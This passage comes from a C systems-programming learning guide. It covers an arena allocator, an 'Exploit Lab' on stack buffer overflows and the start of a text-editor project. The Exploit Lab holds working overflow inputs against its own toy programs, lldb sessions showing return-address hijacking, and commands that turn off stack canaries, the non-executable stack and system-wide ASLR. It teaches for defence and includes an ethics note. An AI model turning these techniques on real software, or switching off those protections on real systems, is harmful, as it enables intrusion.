    • When is this acceptable? (Short-lived, batch allocations)
  3. Memory Alignment
    • Why must some data types start at specific addresses?
    • What happens if you store an int at an odd address? (Crash on some CPUs!)
    • How do you “round up” a pointer to the next aligned address?
    • Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.9.3 - Bryant & O’Hallaron
  4. Getting Memory from the OS
    • What is mmap and when do you use it?
    • What’s the difference between mmap and sbrk?
    • Why might you prefer mmap for an arena?
    • Book Reference: “The Linux Programming Interface” Ch. 49 - Michael Kerrisk

Questions to Guide Your Design

Before implementing, think through these:

  1. Arena Structure
    • What fields does your Arena struct need?
    • At minimum: base pointer, current offset, and capacity
    • Should you store alignment? Should you allow multiple blocks?
  2. Allocation
    • How do you “bump” the pointer?
    • What if the requested size exceeds remaining space?
    • How do you handle alignment for different types?
  3. Reset vs Destroy
    • What does arena_reset do? (Set offset back to 0)
    • What does arena_destroy do? (Free the underlying memory)
    • Why is reset useful? (Reuse the same arena for the next batch)
  4. When to Use Arenas
    • Game frames: allocate during frame, reset at frame end
    • Request handling: allocate during request, reset when done
    • Parsing: allocate AST nodes, free everything when parse is complete
    • What do these patterns have in common?
  5. Growing Arenas (Advanced)
    • What if you run out of space?
    • Option 1: Return NULL (fail)
    • Option 2: Allocate a new block, chain them together
    • What’s the tradeoff?

Thinking Exercise: Design the Data Structure

Before coding, design your arena on paper:

Arena (1024 bytes total)

[ base             ]----+
[ offset = 0       ]    |
[ capacity = 1024  ]    |
                        v
+----------------------------------------------------+
| empty space (1024 bytes)                           |
+----------------------------------------------------+
^
current position (base + offset)

After arena_alloc(arena, 100):

[ base             ]----+
[ offset = 100     ]    |
[ capacity = 1024  ]    |
                        v
+----------------------------------------------------+
| USED: 100 bytes  |  empty space (924 bytes)        |
+----------------------------------------------------+
                   ^
                   current position (base + 100)

After arena_alloc(arena, 200):

[ offset = 300     ]
+----------------------------------------------------+
| USED: 100 |  USED: 200   |  empty (724 bytes)      |
+----------------------------------------------------+
                           ^
                           current position

Arena Allocator States

Questions:

  • What if the next allocation requests 800 bytes?
  • How would you align the second allocation to 8 bytes?
  • What happens to that 724 bytes after arena_reset()?

The Interview Questions They’ll Ask

Prepare to answer these:

  1. “What is an arena allocator? When would you use one?”
  2. “What’s the time complexity of arena allocation vs malloc?”
  3. “Why can’t you free individual allocations from an arena?”
  4. “What is memory alignment and why does it matter?”
  5. “Compare arena allocators to pool allocators to general-purpose allocators.”
  6. “In what scenarios would an arena allocator be faster than malloc?”

Hints in Layers (Only If Stuck)

Hint 1: The Minimal Arena Struct ```c typedef struct { char* base; // Start of memory block size_t offset; // Current position (bytes used) size_t capacity; // Total size of block } Arena; ``` That's it! Three fields.
Hint 2: Basic arena_alloc ```c void* arena_alloc(Arena* arena, size_t size) { if (arena->offset + size > arena->capacity) { return NULL; // Out of space } void* ptr = arena->base + arena->offset; arena->offset += size; return ptr; } ``` This is the "bump." It's O(1)!
Hint 3: Alignment To align to N bytes, round up the offset: ```c size_t align_up(size_t offset, size_t alignment) { return (offset + alignment - 1) & ~(alignment - 1); } void* arena_alloc_aligned(Arena* arena, size_t size, size_t alignment) { size_t aligned_offset = align_up(arena->offset, alignment); if (aligned_offset + size > arena->capacity) { return NULL; } void* ptr = arena->base + aligned_offset; arena->offset = aligned_offset + size; return ptr; } ```
Hint 4: Use mmap for the Block ```c Arena* arena_create(size_t size) { Arena* arena = malloc(sizeof(Arena)); arena->base = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); arena->offset = 0; arena->capacity = size; return arena; } void arena_destroy(Arena* arena) { munmap(arena->base, arena->capacity); free(arena); } ``` `mmap` gives you a large, zero-initialized block directly from the OS.

Books That Will Help

Topic Book Chapter
Arena design patterns “C Interfaces and Implementations” Ch. 5-6
Memory allocator internals “Computer Systems: A Programmer’s Perspective” Ch. 9.9
mmap and virtual memory “The Linux Programming Interface” Ch. 49
Alignment requirements “Computer Systems: A Programmer’s Perspective” Ch. 3.9.3
Allocator strategies “Operating Systems: Three Easy Pieces” Ch. 17

Project 5: Exploit Lab (Buffer Overflow Playground)

  • File: SPRINT_1_REAL_WORLD_PROJECTS.md
  • Programming Language: C
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 3. The “Service & Support” Model
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Security / Systems Internals
  • Software or Tool: GDB / Buffer Overflows
  • Main Book: “Hacking: The Art of Exploitation” by Jon Erickson

What you’ll build: A set of intentionally vulnerable programs and exploits that demonstrate buffer overflow, return address overwriting, and memory corruption—in a controlled environment.

Why it teaches memory & control: Nothing makes memory real like watching your input overwrite a return address and redirect execution. This is where “undefined behavior” stops being a compiler warning and becomes observable reality.

Core challenges you’ll face:

  • Overflowing a buffer to overwrite adjacent variables (maps to: buffer overflow)
  • Overwriting a function’s return address on the stack (maps to: stack layout)
  • Understanding why ASLR/stack canaries exist (maps to: why C doesn’t protect you)
  • Using lldb to observe the corruption in real-time (maps to: debuggers see memory)
  • Crafting input that survives null-byte restrictions (maps to: string representation)

Key Concepts: | Concept | Resource | |———|———-| | Stack smashing | “Hacking: The Art of Exploitation” Ch. 3 - Jon Erickson | | Return-oriented programming basics | LiveOverflow YouTube - “Binary Exploitation” series | | Using sanitizers | LLVM AddressSanitizer documentation |

Difficulty: Intermediate-Advanced Time estimate: 1-2 weeks Prerequisites: Solid understanding of stack frames, comfort with lldb

Real World Outcome

When you complete this project, you’ll have concrete proof that buffer overflows aren’t just theoretical. Here’s what success looks like:

1. Basic Variable Overwrite (Level 1)

Running the exploit:

$ ./level1_vuln $(python3 -c "print('A'*64 + '\x78\x56\x34\x12')")
You win!

What happened: The buffer overflow overwrote the adjacent check variable with the magic value 0x12345678.

Before the overflow (in lldb):

(lldb) frame variable
(char [64]) buffer = ""
(int) check = 0

After the overflow (in lldb):

(lldb) frame variable
(char [64]) buffer = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
(int) check = 305419896 (0x12345678)  // ← Overwritten!

2. Return Address Overwrite (Level 2)

Exploiting the program:

$ ./level2_vuln $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')")
You shouldn't be able to call this function!
Segmentation fault: 11

Visual: Stack Corruption Step-by-Step

Before strcpy:

High addresses
┌────────────────────────────┐
│  Return Address            │  ← 0x00007fff5fbff8a0 (legitimate)
├────────────────────────────┤
│  Saved Frame Pointer       │  ← 0x00007fff5fbff8b0
├────────────────────────────┤
│  buffer[64]                │  ← Empty
│  (64 bytes)                │
└────────────────────────────┘
Low addresses

After strcpy with 72 ‘A’s + address:

High addresses
┌────────────────────────────┐
│  Return Address            │  ← 0x0000000000401156 (win function!)
├────────────────────────────┤
│  Saved Frame Pointer       │  ← 0x4141414141414141 ('AAAAAAAA')
├────────────────────────────┤
│  buffer[64]                │  ← 'AAAA...AAAA' (64 A's)
│  (64 bytes)                │
└────────────────────────────┘
Low addresses

3. Full lldb Session Showing Exploitation

Setting up the debugger:

$ lldb ./level2_vuln
(lldb) breakpoint set --name vulnerable
Breakpoint 1: where = level2_vuln`vulnerable, address = 0x0000000100003f20
(lldb) run $(python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')")

Before the vulnerability:

Process 12345 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
    frame #0: 0x0000000100003f20 level2_vuln`vulnerable
level2_vuln`vulnerable:
->  0x100003f20 <+0>: push   rbp
    0x100003f21 <+1>: mov    rbp, rsp
    0x100003f24 <+4>: sub    rsp, 0x50

(lldb) register read rbp rsp rip
     rbp = 0x00007fff5fbff8b0
     rsp = 0x00007fff5fbff8b8
     rip = 0x0000000100003f20  level2_vuln`vulnerable

After strcpy executes:

(lldb) breakpoint set --name vulnerable --one-shot true
(lldb) continue
(lldb) memory read --size 8 --format x --count 12 $rbp-64

0x7fff5fbff870: 0x4141414141414141  ← buffer starts here
0x7fff5fbff878: 0x4141414141414141
0x7fff5fbff880: 0x4141414141414141
0x7fff5fbff888: 0x4141414141414141
0x7fff5fbff890: 0x4141414141414141
0x7fff5fbff898: 0x4141414141414141
0x7fff5fbff8a0: 0x4141414141414141
0x7fff5fbff8a8: 0x4141414141414141
0x7fff5fbff8b0: 0x4141414141414141  ← saved rbp (corrupted!)
0x7fff5fbff8b8: 0x0000000000401156  ← return address (OVERWRITTEN to win!)

Register dump showing corruption:

(lldb) register read
General Purpose Registers:
       rax = 0x00007fff5fbff870
       rbx = 0x0000000000000000
       rcx = 0x00007fff5fbff870
       rdx = 0x00007fff5fbff9c0
       rdi = 0x00007fff5fbff870  ← points to our 'AAAA...' string
       rsi = 0x00007fff5fbff9c0
       rbp = 0x4141414141414141  ← CORRUPTED! Was a valid address
       rsp = 0x00007fff5fbff8b0
       rip = 0x0000000100003f45  ← still in vulnerable(), about to return

When the function returns:

(lldb) nexti
(lldb) register read rip
       rip = 0x0000000000401156  ← Now executing win()!

Process 12345 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x0000000000401156 level2_vuln`win
level2_vuln`win:
->  0x401156 <+0>: push   rbp
    0x401157 <+1>: mov    rbp, rsp
    0x40115a <+4>: lea    rdi, [rip + 0xe9b]
    0x401161 <+11>: call   puts

Terminal output:

You shouldn't be able to call this function!
You've successfully exploited the buffer overflow!

4. Detection with AddressSanitizer

When you compile the same program with -fsanitize=address, here’s what you see:

$ clang -fsanitize=address -g level2_vuln.c -o level2_vuln_asan
$ ./level2_vuln_asan $(python3 -c "print('A'*72 + 'BBBBBBBB')")

=================================================================
==23456==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffee3bff8b0 at pc 0x000104a3c890 bp 0x7ffee3bff850 sp 0x7ffee3bff010
WRITE of size 80 at 0x7ffee3bff870 thread T0
    #0 0x104a3c88f in __asan_memcpy
    #1 0x104a02156 in vulnerable level2_vuln.c:12
    #2 0x104a02089 in main level2_vuln.c:23
    #3 0x7fff6c3a9cc8 in start

Address 0x7ffee3bff8b0 is located in stack of thread T0 at offset 112 in frame
    #0 0x104a020cf in vulnerable level2_vuln.c:10

  This frame has 1 object(s):
    [32, 96) 'buffer' (line 11) ← 64-byte buffer
HINT: this may be a false positive if your program uses some custom stack unwind mechanism
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow in __asan_memcpy
Shadow bytes around the buggy address:
=>0x1fffdc77fef0: 00 00 00 00 00 00[f1]f1 f1 f1 00 00 00 00 00 00
  0x1fffdc77ff00: 00 00 f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00
==23456==ABORTING

What this shows: AddressSanitizer caught the overflow immediately, showing:

  • Exactly where the write occurred (vulnerable level2_vuln.c:12)
  • How much was written (80 bytes into a 64-byte buffer)
  • The stack frame layout and what got corrupted

5. Deliverables

By the end of this project, you’ll have:

  1. A set of increasingly difficult vulnerable programs:
    • level1.c - Variable overwrite
    • level2.c - Return address overwrite
    • level3.c - Calling a “win” function
    • level4.c - (Advanced) Basic shellcode injection
  2. Exploit scripts for each level:
    • Shows exact byte offsets
    • Demonstrates little-endian encoding
    • Includes comments explaining each step
  3. A detailed write-up (markdown) containing:
    • Stack diagrams for each vulnerability
    • lldb commands used to verify exploitation
    • Before/after register and memory dumps
    • Explanation of what would happen with ASLR/canaries enabled
    • Discussion of modern mitigations (DEP, ASLR, stack canaries)
  4. Visual proof:
    • Screenshots or terminal recordings of successful exploits
    • lldb session logs showing return address modification
    • AddressSanitizer output catching the vulnerabilities

Why This Matters

After completing this project, the phrase “buffer overflow” transforms from an abstract concept to a visceral understanding. You’ve seen:

  • Memory corruption happening in real-time
  • How a simple string copy can hijack program control flow
  • Why security mitigations like ASLR exist
  • That “undefined behavior” has very defined consequences

This knowledge is the foundation for understanding:

  • Why modern languages emphasize memory safety
  • How attackers think about software vulnerabilities
  • What security researchers mean by “exploitable”
  • Why code review and secure coding practices matter

Learning milestones:

  1. First milestone: You can overflow a buffer to change an adjacent variable’s value
  2. Second milestone: You can overwrite a return address to redirect execution
  3. Final milestone: You viscerally understand why memory safety matters

The Core Question You’re Answering

“Why do buffer overflows let attackers take over computers?”

This question has defined computer security for 50 years. By building and exploiting vulnerable programs yourself, you’ll understand exactly how memory corruption becomes code execution—and why this is such a serious problem.


Concepts You Must Understand First

Stop and research these before coding:

  1. Stack Frame Layout (Critical!)
    • What’s in a stack frame? (Local variables, saved frame pointer, return address)
    • In what order are these laid out?
    • Which direction does the stack grow? Which direction do arrays grow?
    • Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 3.7 - Bryant & O’Hallaron
  2. The Return Address
    • What is the return address and where is it stored?
    • What happens at the call instruction? At ret?
    • What if you change the return address to point somewhere else?
    • Book Reference: “Hacking: The Art of Exploitation” Ch. 3 - Jon Erickson
  3. Buffer Overflow Mechanics
    • What happens when you write past the end of a buffer?
    • Why does C allow this? (No bounds checking)
    • What values can you overwrite?
  4. Modern Mitigations
    • ASLR: Randomizes addresses on each run—why does this help?
    • Stack Canaries: Magic values that detect overwrites—how do they work?
    • NX/DEP: Non-executable stack—why is this effective?
    • How do you disable these for learning? (-fno-stack-protector, -z execstack, -no-pie)

Questions to Guide Your Design

Before implementing, think through these:

  1. Level 1: Variable Overwrite
    • Create a program with a buffer and an adjacent “secret” variable
    • How do you overflow the buffer to change the secret?
    • What’s the exact offset you need to write to?
  2. Level 2: Control Flow Hijack
    • Create a program with a vulnerable function
    • Where is the return address relative to the buffer?
    • How do you calculate the exact bytes to overwrite?
    • What address do you redirect execution to?
  3. Level 3: Calling a “Win” Function
    • Create a program with a function that’s never called (void win() { ... })
    • How do you find the address of win()?
    • Craft input that makes the program call win() when it shouldn’t
  4. Level 4: Shellcode (Advanced)
    • What is shellcode?
    • Why do you need the stack to be executable?
    • How do you jump to your own code?
    • What’s a NOP sled and why is it useful?

Thinking Exercise: Map the Stack

Draw the stack for this function:

void vulnerable() {
    char buffer[64];
    int authenticated = 0;

    printf("Enter password: ");
    gets(buffer);  // VULNERABLE!

    if (authenticated) {
        printf("Access granted!\n");
    } else {
        printf("Access denied.\n");
    }
}

Draw the stack frame:

High addresses
+------------------------+
|    return address      |  <-- target for level 2
+------------------------+
|    saved frame pointer |
+------------------------+
|    authenticated (4)   |  <-- target for level 1
+------------------------+
|                        |
|    buffer[64]          |
|                        |
+------------------------+
Low addresses

Vulnerable Stack Frame

Questions:

  • If buffer starts at offset 0, where is authenticated?
  • What input would change authenticated to non-zero?
  • Where is the return address relative to buffer?
  • What input would overwrite the return address?

The Interview Questions They’ll Ask

Prepare to answer these:

  1. “What is a buffer overflow? How does it lead to code execution?”
  2. “Walk me through how a stack-based buffer overflow works.”
  3. “What is ASLR? How does it protect against exploits?”
  4. “What are stack canaries? How do they work?”
  5. “What’s the difference between a stack overflow and a buffer overflow?”
  6. “Why is gets() so dangerous? What should you use instead?”

Hints in Layers (Only If Stuck)

Hint 1: Disable Protections for Learning Compile with protections disabled: ```bash # Disable stack canary gcc -fno-stack-protector vulnerable.c -o vulnerable # Also disable ASLR for consistent addresses echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # For shellcode, make stack executable gcc -fno-stack-protector -z execstack vulnerable.c -o vulnerable ``` **Note**: On macOS, use `lldb` and `-fno-stack-protector`. ASLR is harder to disable.
Hint 2: Find the Offset Create a pattern to find the exact offset: ```bash # Fill with recognizable pattern python3 -c "print('A'*64 + 'BBBB' + 'CCCC')" | ./vulnerable # In lldb, examine where you crashed (lldb) register read rip # If RIP contains 0x43434343 ('CCCC'), offset is 68 bytes ``` Or use a cyclic pattern generator like `pattern_create` from Metasploit.
Hint 3: Simple Variable Overwrite ```c #include #include int main(int argc, char** argv) { int check = 0; char buffer[64]; strcpy(buffer, argv[1]); // VULNERABLE if (check == 0x12345678) { printf("You win!\n"); } else { printf("check = 0x%08x\n", check); } } ``` Run with: `./vuln $(python3 -c "print('A'*64 + '\x78\x56\x34\x12')")` Note the little-endian byte order! </details>
Hint 4: Finding the Win Function Address ```bash # Find address of win() function objdump -d ./vulnerable | grep win # or nm ./vulnerable | grep win # Output like: 0000000000401156 T win # Use this address (in little-endian) as your overwrite target ``` Craft input: ```bash python3 -c "import sys; sys.stdout.buffer.write(b'A'*72 + b'\x56\x11\x40\x00\x00\x00\x00\x00')" | ./vulnerable ```
Hint 5: Use lldb to Watch the Corruption ```bash lldb ./vulnerable (lldb) breakpoint set --name vulnerable (lldb) run AAAABBBBCCCCDDDD... # At the breakpoint (lldb) frame variable # See local variables (lldb) memory read -fx -c32 $rbp-80 # View stack (lldb) register read # See all registers (lldb) continue # After the crash (lldb) register read rip # Where did it try to go? (lldb) bt # Backtrace ```
--- ### Safety and Ethics Note This project involves exploitation techniques. Use them ONLY: - On programs you write yourself - On systems you own or have explicit permission to test - For educational purposes Never attempt to exploit software you don't own or systems you don't control. This is illegal and unethical. --- ### Books That Will Help | Topic | Book | Chapter | |-------|------|---------| | Buffer overflow fundamentals | "Hacking: The Art of Exploitation" | Ch. 3 | | Stack layout and assembly | "Computer Systems: A Programmer's Perspective" | Ch. 3.7-3.10 | | Exploit development | "The Shellcoder's Handbook" | Ch. 1-5 | | Memory corruption attacks | "Practical Binary Analysis" | Ch. 10 | | Modern mitigations | "Secure Coding in C and C++" | Ch. 2-3 | --- ## Project Comparison Table | Project | Difficulty | Time | Depth of Understanding | Fun Factor | |---------|------------|------|------------------------|------------| | Memory Inspector | Beginner | Weekend | ⭐⭐⭐ | ⭐⭐⭐ | | Safe String Library | Beginner-Intermediate | Weekend | ⭐⭐⭐⭐ | ⭐⭐⭐ | | Memory Leak Detector | Intermediate | 1-2 weeks | ⭐⭐⭐⭐⭐ | ⭐⭐⭐⭐ | | Arena Allocator | Intermediate | 1 week | ⭐⭐⭐⭐ | ⭐⭐⭐⭐ | | Exploit Lab | Intermediate-Advanced | 1-2 weeks | ⭐⭐⭐⭐⭐ | ⭐⭐⭐⭐⭐ | --- ## Recommended Learning Path Based on your curriculum, I recommend this sequence: 1. **Start with Memory Inspector** (Weekend 1) - Gets you seeing memory immediately - Low friction, high insight - Foundation for everything else 2. **Then Safe String Library** (Weekend 2) - First taste of "how C fails to protect you" - Pointer arithmetic becomes intuitive 3. **Then Arena Allocator** (Week 2) - Demystifies what allocators actually do - Quick win that builds confidence 4. **Then Memory Leak Detector** (Week 2-3) - Deepest understanding of lifetime and ownership - Most directly maps to real debugging skills 5. **Finish with Exploit Lab** (Week 3+) - Victory lap: everything clicks - Makes abstract dangers concrete --- ## Final Comprehensive Project: Mini Text Editor - **File**: SPRINT_1_REAL_WORLD_PROJECTS.md - **Programming Language**: C - **Coolness Level**: Level 5: Pure Magic (Super Cool) - **Business Potential**: 1. The "Resume Gold" - **Difficulty**: Level 3: Advanced - **Knowledge Area**: Systems Programming / Memory Management - **Software or Tool**: Terminal / ncurses alternative - **Main Book**: "The C Programming Language" by Kernighan & Ritchie **What you'll build**: A terminal-based text editor (think nano/micro) from scratch in C, with undo/redo, search, and file I/O. **Why it teaches everything**: A text editor is the ultimate memory management crucible. You need: - Dynamic buffer management (growing arrays of lines) - String manipulation everywhere (every keystroke modifies strings) - Careful lifetime management (undo history holds old versions) - No leaks (users run editors for hours) - Performance (responsive to every keypress) **Core challenges you'll face**: - Gap buffer or rope data structure for efficient insertion (maps to: *memory layout, allocator design*) - Managing undo/redo stack without leaking (maps to: *object lifetime, when to free*) - Terminal raw mode and escape sequences (maps to: *bytes and interpretation*) - Growing buffers dynamically (maps to: *realloc, fragmentation*) - Finding and fixing your inevitable memory bugs (maps to: *debuggers, sanitizers*) **Resources for key challenges**: - [Kilo Text Editor Tutorial](https://viewsourcecode.org/snaptoken/kilo/) - Antirez's tutorial for building a minimal editor - [Build Your Own Text Editor](https://github.com/codecrafters-io/build-your-own-x#build-your-own-text-editor) - Curated resources **Key Concepts**: | Concept | Resource | |---------|----------| | Gap buffer data structure | "Data Structures and Algorithms" - relevant chapters | | Terminal raw mode | [Kilo tutorial](https://viewsourcecode.org/snaptoken/kilo/) - Step by step | | Undo/redo implementation | "Programming in the Real World" - any chapter on editing models | **Difficulty**: Advanced **Time estimate**: 2-4 weeks **Prerequisites**: All previous projects ## Real World Outcome When you complete this project, you'll have built a fully functional text editor from scratch. Here's what success looks like: ### 1. The Editor Interface **What the terminal looks like when running:** ``` ┌────────────────────────────────────────────────────────────────────────────────┐ │ mini.c - Modified Line 15/42 │ ├────────────────────────────────────────────────────────────────────────────────┤ │ 1 #include │ │ 2 #include │ │ 3 #include │ │ 4 #include │ │ 5 │ │ 6 struct EditorState { │ │ 7 char** lines; │ │ 8 int num_lines; │ │ 9 int cursor_x; │ │ 10 int cursor_y; │ │ 11 int modified; │ │ 12 }; │ │ 13 │ │ 14 void editor_insert_char(EditorState* state, char c) { │ │ 15 // Insert character at cursor position█ │ │ 16 char* line = state->lines[state->cursor_y]; │ │ 17 // Expand line buffer if needed │ │ 18 ... │ │ 19 } │ │ 20 │ │ ~ │ │ ~ │ │ ~ │ ├────────────────────────────────────────────────────────────────────────────────┤ │ Ctrl-S: Save | Ctrl-Q: Quit | Ctrl-Z: Undo | Ctrl-Y: Redo | Ctrl-F: Find │ └────────────────────────────────────────────────────────────────────────────────┘ ``` **Key visual elements:** - **Header bar**: Shows filename, modification status, and current line/total lines - **Line numbers**: Left gutter showing line numbers (optional but professional) - **Active cursor**: Visible blinking cursor (`█`) at current position - **Status bar**: Bottom bar showing available keyboard shortcuts - **Tilde markers**: `~` indicates lines beyond end of file (like vim/nano) ### 2. Step-by-Step Walkthrough: Using the Editor **Opening a file:** ```bash $ ./mini_editor hello.txt # If file doesn't exist, editor starts with empty buffer # If file exists, content is loaded into memory ``` **Initial empty state:** ``` ┌────────────────────────────────────────────────────────────────────────────────┐ │ hello.txt - New File Line 1/1 │ ├────────────────────────────────────────────────────────────────────────────────┤ │ 1 █ │ │ ~ │ │ ~ │ │ ~ │ ├────────────────────────────────────────────────────────────────────────────────┤ │ Ctrl-S: Save | Ctrl-Q: Quit | Ctrl-Z: Undo | Ctrl-Y: Redo │ └────────────────────────────────────────────────────────────────────────────────┘ ``` **Typing text:** ``` User types: "Hello, World!" ┌────────────────────────────────────────────────────────────────────────────────┐ │ hello.txt - Modified Line 1/1 │ ├────────────────────────────────────────────────────────────────────────────────┤ │ 1 Hello, World!█ │ │ ~ │ │ ~ │ │ ~ │ ├────────────────────────────────────────────────────────────────────────────────┤ │ Ctrl-S: Save | Ctrl-Q: Quit | Ctrl-Z: Undo | Ctrl-Y: Redo │ └────────────────────────────────────────────────────────────────────────────────┘ # Notice: # - "Modified" indicator appears in header # - Cursor moves as you type # - Text appears immediately (no lag) ``` **Pressing Enter to create new lines:** ``` User types: [Hello, World!] → [Enter] → [This is line 2] ┌────────────────────────────────────────────────────────────────────────────────┐ │ hello.txt - Modified Line 2/2 │ ├────────────────────────────────────────────────────────────────────────────────┤ │ 1 Hello, World! │ │ 2 This is line 2█ │ │ ~ │ │ ~ │ ├────────────────────────────────────────────────────────────────────────────────┤ │ Ctrl-S: Save | Ctrl-Q: Quit | Ctrl-Z: Undo | Ctrl-Y: Redo │ └────────────────────────────────────────────────────────────────────────────────┘ # Notice: # - Line count updated (2/2) # - Cursor on line 2 # - Gap buffer efficiently handles insertion ``` **Using Undo (Ctrl-Z):** ``` User presses: Ctrl-Z ┌────────────────────────────────────────────────────────────────────────────────┐ │ hello.txt - Modified Line 1/1 │ ├────────────────────────────────────────────────────────────────────────────────┤ │ 1 Hello, World!█ │ │ ~ │ │ ~ │ │ ~ │ ├────────────────────────────────────────────────────────────────────────────────┤ │ Undid: Insert line │ └────────────────────────────────────────────────────────────────────────────────┘ # The second line disappeared! # Undo stack popped the last action # Redo stack now contains the undone action ``` **Using Redo (Ctrl-Y):** ``` User presses: Ctrl-Y ┌────────────────────────────────────────────────────────────────────────────────┐ │ hello.txt - Modified Line 2/2 │ ├────────────────────────────────────────────────────────────────────────────────┤ │ 1 Hello, World! │ │ 2 This is line 2█ │ │ ~ │ │ ~ │ ├────────────────────────────────────────────────────────────────────────────────┤ │ Redid: Insert line │ └────────────────────────────────────────────────────────────────────────────────┘ # Line 2 is back! # Redo stack was popped, undo stack was pushed ``` **Saving the file (Ctrl-S):** ``` User presses: Ctrl-S ┌────────────────────────────────────────────────────────────────────────────────┐ │ hello.txt Line 2/2 │ ├────────────────────────────────────────────────────────────────────────────────┤ │ 1 Hello, World! │ │ 2 This is line 2█ │ │ ~ │ │ ~ │ ├────────────────────────────────────────────────────────────────────────────────┤ │ Saved 2 lines to hello.txt │ └────────────────────────────────────────────────────────────────────────────────┘ # Notice: # - "Modified" indicator removed from header # - Status bar shows confirmation # - File written to disk ``` ### 3. Memory Safety Verification with AddressSanitizer **Compiling with AddressSanitizer:** ```bash $ clang -fsanitize=address -g -O1 mini_editor.c -o mini_editor ``` **Running a stress test session:** ```bash $ ./mini_editor test.txt # Perform these operations: # 1. Type 1000 characters # 2. Create 50 new lines # 3. Delete 25 lines # 4. Undo 30 times # 5. Redo 30 times # 6. Search for text 10 times # 7. Save file # 8. Quit (Ctrl-Q) ``` **AddressSanitizer output on clean exit:** ``` ================================================================= ==12345==AddressSanitizer: exiting ASAN:DEADLYSIGNAL ================================================================= ==12345==LeakSanitizer: detected memory leaks # ... detailed leak report would appear here if there were leaks ... Direct leak of 0 bytes in 0 objects allocated from: #0 0x... in malloc Indirect leak of 0 bytes in 0 objects allocated from: #0 0x... in malloc SUMMARY: AddressSanitizer: 0 byte(s) leaked in 0 allocation(s). ``` **Perfect output (no errors, no leaks):** ```bash $ ./mini_editor test.txt # ... use the editor normally ... # ... perform many edits, undo/redo operations ... # ... save and quit ... $ echo $? 0 # No output from AddressSanitizer means: # ✓ No buffer overflows # ✓ No use-after-free # ✓ No double-free # ✓ No memory leaks # ✓ Clean exit with all memory freed ``` **What AddressSanitizer catches if you have bugs:** ```bash # Example 1: Memory leak in undo stack ================================================================= ==45678==ERROR: LeakSanitizer: detected memory leaks Direct leak of 512 bytes in 8 objects allocated from: #0 0x10a3c890 in malloc #1 0x10a02345 in undo_push editor.c:156 #2 0x10a02120 in editor_insert_char editor.c:89 SUMMARY: AddressSanitizer: 512 byte(s) leaked in 8 allocation(s). # Example 2: Use-after-free in line buffer ================================================================= ==45679==ERROR: AddressSanitizer: heap-use-after-free on address 0x602000001234 READ of size 1 at 0x602000001234 thread T0 #0 0x10a03456 in editor_render_line editor.c:234 #1 0x10a02890 in editor_refresh_screen editor.c:201 0x602000001234 is located 4 bytes inside of 64-byte region [0x602000001230,0x602000001270) freed by thread T0 here: #0 0x10a3c920 in free #1 0x10a02567 in editor_delete_line editor.c:178 previously allocated by thread T0 here: #0 0x10a3c890 in malloc #1 0x10a02123 in editor_insert_line editor.c:145 SUMMARY: AddressSanitizer: heap-use-after-free editor.c:234 in editor_render_line ``` ### 4. Performance Characteristics **Terminal output showing responsiveness:** ```bash # Test: Type 10,000 characters rapidly $ time (yes "a" | head -n 10000 | ./mini_editor speed_test.txt) real 0m0.234s # ← Near-instant, responsive user 0m0.180s sys 0m0.048s # Gap buffer makes cursor-position inserts O(1) # Screen refresh is optimized (only draw what changed) ``` ### 5. Final Deliverables By the end of this project, you'll have: 1. **A working text editor binary** that: - Opens and displays files - Allows text editing with immediate visual feedback - Supports navigation with arrow keys - Implements undo/redo with Ctrl-Z and Ctrl-Y - Saves files to disk - Handles files of reasonable size (up to thousands of lines) 2. **Clean memory management** verified by: - AddressSanitizer showing 0 leaks - Valgrind showing "All heap blocks were freed" - No crashes during extended use 3. **Well-structured code** including: - `editor.c` - Core editor logic - `buffer.c` - Gap buffer implementation - `terminal.c` - Raw mode and ANSI escape sequences - `undo.c` - Undo/redo stack management - `main.c` - Entry point and main loop 4. **Documentation** showing: - Architecture decisions (why gap buffer vs rope) - Memory ownership diagram - Undo/redo state machine - Performance characteristics ### Why This Matters A text editor is the ultimate integration project because it requires: - **Memory management expertise**: Dynamic buffers, undo history, no leaks over hours of use - **Real-time performance**: Every keystroke must be instant, no visible lag - **Stateful complexity**: Cursor position, undo stack, modified flag, file I/O - **Systems programming**: Raw terminal mode, escape sequences, signal handling - **Data structure mastery**: Gap buffers for efficient editing After completing this, you'll have proven you can: - Build a complex, stateful application in C - Manage memory lifetimes across multiple subsystems - Reason about performance (why gap buffer vs linked list) - Debug memory issues in a real codebase - Ship a working product that you actually use This is Resume Gold because you can: - Demo it live in an interview - Show the code and explain design decisions - Point to AddressSanitizer output proving no leaks - Compare it to real editors (nano, vim, emacs) architecturally **Most importantly**: You'll have crossed the threshold from "learning C" to "building with C." --- **Learning milestones**: 1. **First milestone**: Basic text display and cursor movement—you understand terminal I/O at the byte level 2. **Second milestone**: Insert/delete characters—you've built a gap buffer and understand why 3. **Third milestone**: Undo/redo works—you truly understand object lifetime and ownership 4. **Final milestone**: You run your editor daily while developing, and it doesn't crash --- ### The Core Question You're Answering > "Can I build a real, usable application that manages complex memory lifetimes without leaking or crashing?" A text editor is the ultimate test of memory management skills. Users run editors for hours. Every keystroke modifies data structures. Undo/redo holds history. If you leak, the program eventually dies. If you double-free, it crashes immediately. There's nowhere to hide. --- ### Concepts You Must Understand First **Stop and research these before coding:** 1. **Terminal Raw Mode** - What's the difference between "cooked" and "raw" terminal mode? - How do you read individual keypresses without waiting for Enter? - How do you disable echo, line buffering, and control characters? - *Book Reference:* "Advanced Programming in the UNIX Environment" Ch. 18 - Stevens & Rago 2. **ANSI Escape Sequences** - How do you move the cursor with escape codes? - How do you clear the screen? Change colors? - 